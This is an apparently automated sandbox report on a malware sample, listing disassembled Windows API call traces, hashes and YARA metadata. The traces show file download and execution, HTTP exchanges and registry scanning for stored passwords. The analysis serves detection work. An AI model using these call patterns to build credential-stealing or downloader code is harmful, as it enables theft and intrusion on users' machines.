                                      • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                      • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                      • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                      • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00406147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                      • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                      • InternetCloseHandle.WININET(a+A), ref: 00406253
                                      • InternetCloseHandle.WININET(00000000), ref: 00406260
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID: a+A$a+A
                                      • API String ID: 4287319946-2847607090
                                      • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                      • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                      • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                      • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memset.MSVCRT ref: 02310E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 02310F01
                                      • lstrlen.KERNEL32(?), ref: 02310F0E
                                      • memset.MSVCRT ref: 02310F34
                                      • memset.MSVCRT ref: 02310F48
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02319927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02310DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02319948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02310FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02310FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction ID: 35522517d7eb90b59c97a0f8d1b3203d1006c9361fafea9de1f17707d8db9016
                                      • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction Fuzzy Hash: 388195B5941218ABCB2CEBA0DD91FED773AAF44305F404199A30A660C1EF746B88CF59
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memset.MSVCRT ref: 02310E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 02310F01
                                      • lstrlen.KERNEL32(?), ref: 02310F0E
                                      • memset.MSVCRT ref: 02310F34
                                      • memset.MSVCRT ref: 02310F48
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02319927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02310DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02319948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02310FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02310FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction ID: 42f3598f976658086c349e589bc73ac3edb5ff9273cd19556ab1fc093f0eff73
                                      • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction Fuzzy Hash: B761B4B5501218ABCB2CEBA0DD95FED773AAF44305F404199E70A660C1EF746B88CF59
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02304B7C
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 02304BA1
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02304D21
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0230504F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0230506B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0230507F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023050B0
                                      • InternetCloseHandle.WININET(00000000), ref: 02305114
                                      • InternetCloseHandle.WININET(00000000), ref: 0230512C
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02304D7C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 02305136
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID:
                                      • API String ID: 2402878923-0
                                      • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction ID: 9a3129397ed7561faf28734569129f4ea8a4a7272e8207a062f8084ca6bf87ab
                                      • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction Fuzzy Hash: 5C12B076911258ABCB2DEB90DD91FEEB77ABF15301F504199A10AB2090EF742F88CF51
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02306548
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 0230656A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0230659C
                                      • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023065EC
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02306626
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02306638
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02306664
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023066D4
                                      • InternetCloseHandle.WININET(00000000), ref: 02306756
                                      • InternetCloseHandle.WININET(00000000), ref: 02306760
                                      • InternetCloseHandle.WININET(00000000), ref: 0230676A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID:
                                      • API String ID: 3074848878-0
                                      • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction ID: 3faa9ca742e78e169a21579ca2e79550fd2c74944e007af0d1768bf2a4266fc3
                                      • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction Fuzzy Hash: 2C718C75A40218ABDB24DFE0CC99BEEB779FB44700F108199E10AAB1D4DBB46A84CF51
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 023192D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID:
                                      • API String ID: 2244384528-0
                                      • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction ID: 93d5801fea019961653deb4997089ad8260a1894146cf5cf16677cca6bf021e9
                                      • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction Fuzzy Hash: 1A71FCB9A50208ABDB18DFE4DC94FEEB7B9FF49700F108508F515A7290DB34A905CB61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                      • memset.MSVCRT ref: 0041716A
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                      Strings
                                      • sA, xrefs: 004172AE, 00417179, 0041717C
                                      • sA, xrefs: 00417111
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 224852652-2614523144
                                      • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                      • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                      • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                      • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 023177A9
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 023177E6
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231786A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317871
                                      • wsprintfA.USER32 ref: 023178A7
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$B
                                      • API String ID: 1544550907-183544611
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 870a1a08491ab66902df90ca94465ab6c2af441709b30ab2239d20717ee685e8
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: 6E41A2B1D00258EBDB24DF94DC45BEEBBB9EF48700F140199E509A7280D7756A84CFA5
                                      APIs
                                        • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                        • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                        • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                        • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                        • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                        • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                      • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                      • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                      • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                      • task.LIBCPMTD ref: 004076FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                      • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                      • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                      • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                      APIs
                                      • lstrcpy.KERNEL32(?,?), ref: 02311642
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                        • Part of subcall function 023194C7: StrStrA.SHLWAPI(?,?), ref: 023194D3
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231167E
                                        • Part of subcall function 023194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 023194F7
                                        • Part of subcall function 023194C7: lstrlen.KERNEL32(?), ref: 0231950E
                                        • Part of subcall function 023194C7: wsprintfA.USER32 ref: 0231952E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 023116C6
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231170E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 02311755
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231179D
                                      • lstrcpy.KERNEL32(?,00000000), ref: 023117E5
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231182C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 02311874
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                      • strtok_s.MSVCRT ref: 023119B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                      • String ID:
                                      • API String ID: 4276352425-0
                                      • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction ID: a56ff06699d52ae3279ffc9877df94914b5bbbbae634b3affa73dbde24a3de11
                                      • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction Fuzzy Hash: D27194B6951118ABCB28EBB0DC98FEE777AAF54301F0449D9E10DA3140EE759B84CF61
                                      APIs
                                      • memset.MSVCRT ref: 00407314
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                        • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                      • task.LIBCPMTD ref: 00407555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                      • String ID: Password
                                      • API String ID: 2698061284-3434357891
                                      • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                      • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                      APIs
                                      • lstrcatA.KERNEL32(?,008807A0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                      • lstrcatA.KERNEL32(?,?), ref: 00414820
                                      • lstrcatA.KERNEL32(?,?), ref: 00414834
                                      • lstrcatA.KERNEL32(?,0087CDB0), ref: 00414847
                                      • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                      • lstrcatA.KERNEL32(?,00881020), ref: 0041486F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                        • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                        • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                        • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
